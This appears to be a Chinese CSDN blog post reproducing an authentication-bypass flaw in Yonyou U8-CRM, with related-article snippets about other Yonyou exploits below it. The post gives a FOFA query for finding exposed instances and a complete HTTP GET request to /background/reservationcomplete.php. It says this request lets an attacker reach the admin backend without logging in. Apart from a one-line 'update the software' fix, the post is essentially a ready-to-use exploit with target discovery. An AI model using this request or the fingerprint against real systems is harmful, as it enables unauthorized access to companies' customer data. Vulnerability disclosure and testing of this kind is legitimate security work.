用友 CRM reservationcomplete.php存在逻辑漏洞

最新推荐文章于 2024-06-17 10:49:46 发布
最新推荐文章于 2024-06-17 10:49:46 发布
阅读量506 收藏 9
点赞数 7
分类专栏: 漏洞复现 文章标签: php 开发语言 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/135479088
版权

产品简介

用友U8-CRM是一款由用友软件开发的客户关系管理(CRM)系统。它是基于用友U8企业管理软件平台开发的,旨在帮助企业有效管理和维护与客户之间的关系。该系统提供了一系列功能,包括客户信息管理、销售机会跟踪、市场营销活动管理、客户服务支持等。通过使用用友U8-CRM,企业可以更好地了解客户需求,提高销售效率,增强客户满意度,并实现更好的客户关系管理。

漏洞概述

CRM系统reservationcomplete.php接口处存在逻辑漏洞,攻击者通过漏洞可以进入系统后台

指纹识别

fofa:

app="用友U8CRM"

漏洞利用

poc:

GET /background/reservationcomplete.php?ID=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1

在这里插入图片描述
访问漏洞url后,直接访问主页,即可绕过登录至后台
在这里插入图片描述

修复建议

联系软件厂商更新至最新安全版本

【人间处处,春雨杏花急急落,车马春山慢慢行。】

3tefanie丶zhou
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
用友U8+CRM 逻辑漏洞登录后台漏洞复现
0xSec
01-06 1201
用友 U8 CRM客户关系管理系统reservationcomplete.php文件存在逻辑漏洞,未授权的攻击者通过漏洞可以直接登录后台,获取系统内部敏感信息,使系统处于极不安全状态。
用友U8 CRM uploadfile 文件上传致RCE漏洞复现
0xSec
05-22 461
用友U8CRM客户关系管理系统uploadfile.php 文件存在任意文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。
用友CRM reservationcomplete.php逻辑漏洞登录后台
Keepb1ue的博客
01-06 512
用友CRM(Customer Relationship Management,客户关系管理)是由用友公司开发的一款软件,专门设计用于帮助企业管理与客户相关的业务活动。这款软件通常包括客户信息管理、销售管理、市场营销、客户服务和技术支持等功能。用友CRM的目标是帮助企业改善与客户的关系,提升客户满意度,优化销售和服务流程,从而提高企业的市场竞争力。它适用于各种规模的企业,可以根据不同企业的具体需求进行定制和扩展。
用友U8CRM reservationcomplete.php 逻辑漏洞复现
03-21 257
用友U8+CRM是一款专为企业提供客户关系管理解决方案的软件。它通过整合多种网络化、低成本营销手段和沟通方式,帮助企业建立与客户之间通畅的交流平台。
用友php漏洞,用友CRM注入漏洞(无需登录通杀所有版本)
weixin_34977368的博客
04-10 1154
用友TurboCRM存在通用sql注入。http://**.**.**.**:8081/login/login.php如下图找到找回密码页访问http://**.**.**.**:8081/login/changepswd.php?orgcode=1&loginname=system输入信息抓包POST /login/changepswd.php?orgcode=1&loginna...
用友ncc accept.jsp漏洞
没事我溜达
03-15 2243
用友ncc存在accep.jsp漏洞 可造成任意文件上传
用友 CRM help2.php存在任意文件读取漏洞
3tefanie丶zhou的博客
12-19 678
【天底下喜欢讲道理的人,大致可以分为两种,一种是为了让自己心里好受,一种是希望让世道好过。】
【漏洞复现】-用友CRM系统存在逻辑漏洞直接登录后台
weixin_51641247的博客
03-06 688
【漏洞复现】-用友CRM系统存在逻辑漏洞直接登录后台
37.用友CRM解决方案.ppt.rar
04-25
用友网络科技股份有限公司(以下简称“用友”)是中国领先的企业管理软件和云服务提供商,其CRM解决方案是企业数字化转型的有力工具。该方案在《用友CRM解决方案.ppt.rar》文件中得到了详尽的阐述,此压缩包内包含了...
用友u816.5 官网下载,含发版说明,报价和插件,有需要的可以下载学习
11-13
"用友u816.5 官网下载,含发版说明,报价和插件,有需要的可以下载学习" 以下是根据给定文件信息生成的相关知识点: 1. 用友U8+V16.5 软件的主要功能与特点: - 系统功能升级,整合生态发展、老客户经营、数据...
用友软件温州分公司CRM.ppt
11-12
用友软件温州分公司CRM.ppt
用友U816.5安装说明
02-23
用友U8安装说明
用友T3客户通CRM软件产品介绍全.ppt
11-13
用友T3客户通CRM软件产品介绍全 用友T3客户通CRM软件产品是一款专门为中小型企业量身定制的客户关系管理软件(CRM)。它按照客户细分情况有效地组织企业资源,培养以客户为中心的经营行为和实施以客户为中心的业务...
深入解析PHP函数
最新发布
NatLindsay的博客
06-17 213
PHP函数是一种重要的编程概念,它可以帮助开发者组织和管理代码,提高代码的可重用性和可维护性。在PHP中,函数可以完成各种任务,从简单的数学计算到复杂的数据库查询和数据处理。本文将从多个角度探讨PHP函数的应用,涵盖了函数的定义和调用、内置函数的使用、自定义函数的创建以及常见的函数库。函数的参数:函数可以接受零个或多个参数,用于传递数据给函数内部使用。函数可以带有参数,用于接收输入,也可以返回值。函数命名:选择一个有意义的函数名,以便描述函数的功能。函数体:编写函数的具体实现代码,实现特定的功能。
1. NAS和SAN存储
u010198709的博客
06-13 469
流程:存储端共享裸块设备,客户端连接存储映射出sdx的虚拟硬盘,客户端分区格式化挂载使用。IQN名称格式: iqn.yyyy-mm.反域名:自定义名称。用户名:openfiler, 密码:password。磁盘接口:SATA,SAS、NVME。支持nfs、cifs协议共享存储空间。nfs:适用于Linux、Unix。类型:IP SAN、FC SAN。cifs:适用于Windows。磁盘类型:机械硬盘、SSD。基于文件系统级别的共享。DAS 直接附加存储。NAS 网络附加存储。SAN 存储区域网络。
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 312
异常处理的基本原理是,当try块中的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程中至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程中的错误和异常情况,提高代码的稳定性和可靠性。在实际开发中,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
源码编译安装LAMP
潇的博客
06-12 887
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
教育培训系统(FastAdmin+ThinkPHP+Unipp)
2401_84413757的博客
06-17 364
教育培训系统是一个集在线课程、学习资源、互动交流等功能于一体的综合性学习平台。它打破了传统教育的时空限制,让学习变得更加灵活自由。学员们可以根据自己的时间和需求,随时随地访问系统,选择感兴趣的课程进行学习。教育培训系统以其便捷的学习方式、丰富的资源和智能的评估功能,为我们的学习之路增添了色彩。让我们一起拥抱这个全新的学习平台,让学习变得更简单、更有趣!
用友u813.0部署
09-14
您好!对于用友U8 13.0的部署,以下是一个基本的步骤: 1. 首先,确保您的服务器满足用友U8 13.0的系统要求,包括操作系统、硬件配置等。 2. 安装数据库:用友U8 13.0支持多种数据库,您可以根据自己的需求选择合适的数据库,并按照相应的安装步骤进行安装和配置。 3. 下载用友U8 13.0安装程序:您可以从用友官方网站或授权渠道下载用友U8 13.0的安装程序。 4. 运行安装程序:解压安装程序后,运行安装程序并按照向导进行操作。在安装过程中,您需要选择安装路径、数据库类型、数据库连接等相关配置。 5. 数据库初始化:在安装完成后,您需要对数据库进行初始化。具体操作可参考用友U8 13.0的官方文档或安装手册。 6. 配置系统参数:根据您的实际需求,对用友U8 13.0的系统参数进行配置,如企业资料、财务参数、权限设置等。 7. 部署客户端:根据需要,在客户端机器上安装用友U8 13.0的客户端,并按照相应的配置进行连接。 以上是一个基本的部署步骤,具体操作可能因环境和需求而有所差异。强烈建议您在部署过程中参考用友U8 13.0的官方文档或向用友相关技术支持人员寻求帮助。希望对您有所帮助!如果有任何问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值